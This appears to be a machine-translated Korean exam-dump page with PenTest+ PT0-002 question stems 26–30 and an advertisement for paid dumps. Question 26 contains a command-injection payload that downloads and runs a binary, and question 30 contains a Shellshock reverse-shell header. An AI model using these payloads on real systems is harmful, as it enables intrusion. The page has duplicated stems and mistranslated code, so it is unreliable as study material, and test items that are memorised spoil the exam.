PT0-002 문제 26
침투 테스터가 익스플로잇을 사용하여 시스템에 액세스할 수 있었습니다. 다음은 사용된 코드 스니펫입니다.
익스플로잇 = "포스트"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후 실행해야 하는 명령은 무엇입니까?
익스플로잇 = "포스트"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후 실행해야 하는 명령은 무엇입니까?
PT0-002 문제 27
SCADA 장치를 사용하여 환경에 대한 침투 테스트를 수행하면 다음과 같은 이유로 추가 안전 위험이 발생합니다.
PT0-002 문제 28
한 회사는 제조 공장의 사이버-물리 시스템을 검토하기 위해 침투 테스트 팀을 고용했습니다. 팀은 감독 시스템과 PLC가 모두 회사 인트라넷에 연결되어 있음을 즉시 발견했습니다. 침투 테스트 팀이 다음 가정 중 MOST가 유효할 가능성이 있는 가정은 무엇입니까?
PT0-002 문제 29
침투 테스터는 다음 명령을 수행합니다.
컬 -I -http2 https://www.comptia.org
다음 중 테스터가 받을 가능성이 가장 높은 출력 스니펫은 무엇입니까?
컬 -I -http2 https://www.comptia.org
다음 중 테스터가 받을 가능성이 가장 높은 출력 스니펫은 무엇입니까?
PT0-002 문제 30
침투 테스터가 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 전송하는 Python 스크립트를 편집하고 다음 코드를 발견합니다.
exploits = {"User-Agent": "() { 무시됨;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application /xhtml+xml,응용 프로그램/xml"}
다음 중 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 테스터가 스크립트를 수정해야 하는 것은 무엇입니까?
exploits = {"User-Agent": "() { 무시됨;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application /xhtml+xml,응용 프로그램/xml"}
다음 중 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 테스터가 스크립트를 수정해야 하는 것은 무엇입니까?
프리미엄 번들
DumpTop 에서 공유하는 최신 PT0-002 시험 덤프는 PT0-002 시험패스를 도와드릴수 있습니다! DumpTop 은 최근 업데이트된 PT0-002 시험자료를 제공해드립니다. DumpTop PT0-002 덤프도 시험문제 변경에 따라 업데이트되었으며 오답도 수정되었습니다. DumpTop PT0-002 덤프 최신버전을 공유받아보세요.
(460 Q&As 덤프, 30%OFF할인코드: KrDump)